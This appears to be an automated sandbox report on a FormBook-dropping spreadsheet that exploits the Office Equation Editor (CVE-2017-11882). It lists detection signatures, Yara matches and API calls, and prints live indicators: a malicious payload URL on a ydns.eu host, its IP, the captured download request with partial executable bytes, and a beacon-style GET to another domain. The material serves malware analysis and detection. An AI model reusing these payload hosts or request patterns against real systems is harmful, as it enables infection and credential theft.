Analysis Report Request for quotation.xlsx

Overview

General Information

Sample Name: Request for quotation.xlsx
Analysis ID: 321122
MD5: 109bae1300099a20ad3df28d09095bf1
SHA1: dd2c886624df876a75389a5690cf55fd59a0b217
SHA256: 1154f054c7344a07eed067053d6f3cfec18bc3aee5078e94c3a77bba3827bb06
Tags: FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\Public\vbc.exe Avira: detection malicious, Label: TR/AD.Swotter.yiimo
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Avira: detection malicious, Label: TR/AD.Swotter.yiimo
Multi AV Scanner detection for domain / URL
Source: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe ReversingLabs: Detection: 33%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: Request for quotation.xlsx Virustotal: Detection: 33% Perma Link
Source: Request for quotation.xlsx ReversingLabs: Detection: 22%
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A556E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 9_2_4A556E47
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 9_2_4A552E73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A570202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError, 9_2_4A570202
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A56BF0C FindFirstFileW,FindNextFileW,FindClose, 9_2_4A56BF0C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A55BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose, 9_2_4A55BBA4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A570492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose, 9_2_4A570492

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 7_2_0040E451
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then mov edi, edi 9_2_4A55C02E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 9_2_0008E451
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 10:27:54 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 19 Nov 2020 20:54:09 GMTETag: "eb000-5b47bede9f95e"Accept-Ranges: bytesContent-Length: 962560Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 db b6 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 2e 0c 00 00 80 02 00 00 00 00 00 ee 4c 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 4c 0c 00 4b 00 00 00 00 60 0c 00 b4 7d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 2c 0c 00 00 20 00 00 00 2e 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 7d 02 00 00 60 0c 00 00 7e 02 00 00 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0e 00 00 02 00 00 00 ae 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4c 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 52 00 00 3c 40 00 00 03 00 00 00 f4 00 00 06 0c 93 00 00 89 b9 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 3f 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 18 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 2a 02 28 04 00 00 06 20 00 00 00 00 16 3a e0 ff ff ff 26 20 00 00 00 00 38 d5 ff ff ff 00 13 30 03 00 4d 00 00 00 02 00 00 11 20 01 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 02 00 00 00 22 00 00 00 05 00 00 00 38 1d 00 00 00 73 22 00 00 06 13 00 20 00 00 00 00 28 05 00 00 06 3a d8 ff ff ff 26 38 ce ff ff ff 2a 11 00 6f 19 00 00 06 38 f3 ff ff ff 00 00 00 13 30 03 00 b1 00 00 00 01 00 00 11 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 65 00 00 00 45 00 00 00 25 00 00 00 64 00 00 00 05 00 00 00 38 60 00 00 00 02 7b 01 00 00 04 28 07 00 00 06 20 00 00 00 00 28 05 00 00 06 3a c8 ff ff ff 26 38 be ff ff ff 03 39 3a 00 00 00 20 01 00 00 00 28 05 00 00 06 3a ad ff ff ff 26 20 01 00 00 00 38 a2 ff ff ff 02 7b 01 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1Host: www.segredosdocopywriting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.euConnection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Jump to behavior
Source: global traffic HTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1Host: www.segredosdocopywriting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000008.00000000.2258936880.0000000004F30000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 7_2_00419D60 NtCreateFile, 7_2_00419D60
Source: C:\Users\Public\vbc.exe Code function: 7_2_00419E10 NtReadFile, 7_2_00419E10
Source: C:\Users\Public\vbc.exe Code function: 7_2_00419E90 NtClose, 7_2_00419E90
Source: C:\Users\Public\vbc.exe Code function: 7_2_00419F40 NtAllocateVirtualMemory, 7_2_00419F40
Source: C:\Users\Public\vbc.exe Code function: 7_2_00419E0A NtReadFile, 7_2_00419E0A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00419E8F NtClose, 7_2_00419E8F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A300C4 NtCreateFile,LdrInitializeThunk, 7_2_00A300C4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A30078 NtResumeThread,LdrInitializeThunk, 7_2_00A30078
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A30048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_00A30048
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2F9F0 NtClose,LdrInitializeThunk, 7_2_00A2F9F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2F900 NtReadFile,LdrInitializeThunk, 7_2_00A2F900
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_00A2FAE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_00A2FAD0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_00A2FBB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_00A2FB68
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_00A2FC90
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_00A2FC60
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FD8C NtDelayExecution,LdrInitializeThunk, 7_2_00A2FD8C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_00A2FDC0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_00A2FEA0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_00A2FED0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FFB4 NtCreateSection,LdrInitializeThunk, 7_2_00A2FFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A30060 NtQuerySection, 7_2_00A30060
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A301D4 NtSetValueKey, 7_2_00A301D4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A3010C NtOpenDirectoryObject, 7_2_00A3010C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A307AC NtCreateMutant, 7_2_00A307AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A30C40 NtGetContextThread, 7_2_00A30C40
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A310D0 NtOpenProcessToken, 7_2_00A310D0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A31148 NtOpenThread, 7_2_00A31148
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2F8CC NtWaitForSingleObject, 7_2_00A2F8CC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A31930 NtSetContextThread, 7_2_00A31930
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2F938 NtWriteFile, 7_2_00A2F938
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FAB8 NtQueryValueKey, 7_2_00A2FAB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FA20 NtQueryInformationFile, 7_2_00A2FA20
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FA50 NtEnumerateValueKey, 7_2_00A2FA50
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FBE8 NtQueryVirtualMemory, 7_2_00A2FBE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FB50 NtCreateKey, 7_2_00A2FB50
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FC30 NtOpenProcess, 7_2_00A2FC30
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FC48 NtSetInformationFile, 7_2_00A2FC48
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A31D80 NtSuspendThread, 7_2_00A31D80
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FD5C NtEnumerateKey, 7_2_00A2FD5C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FE24 NtWriteVirtualMemory, 7_2_00A2FE24
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FFFC NtCreateProcessEx, 7_2_00A2FFFC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00A2FF34 NtQueueApcThread, 7_2_00A2FF34
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A571E5F SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW, 9_2_4A571E5F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A56F6CF NtSetInformationProcess,GetFileAttributesW,_get_osfhandle,SetEndOfFile, 9_2_4A56F6CF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A55C2A6 NtQueryInformationToken,GetCPInfo,NtQueryInformationToken,GetCPInfo,NtQueryInformationToken, 9_2_4A55C2A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A55C48A GetCPInfo,NtOpenThreadToken,NtOpenProcessToken,GetCPInfo,NtClose, 9_2_4A55C48A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A5618A6 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,NtSetInformationProcess, 9_2_4A5618A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_4A55C52D NtQueryInformationToken, 9_2_4A55C52D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022900C4 NtCreateFile,LdrInitializeThunk, 9_2_022900C4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_022907AC NtCreateMutant,LdrInitializeThunk, 9_2_022907AC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_0228FAE8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_0228FB68
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FB50 NtCreateKey,LdrInitializeThunk, 9_2_0228FB50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_0228FBB8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228F900 NtReadFile,LdrInitializeThunk, 9_2_0228F900
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228F9F0 NtClose,LdrInitializeThunk, 9_2_0228F9F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_0228FED0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 9_2_0228FFB4 NtCreateSection,LdrInitializeThunk, 9_2_0228FFB4
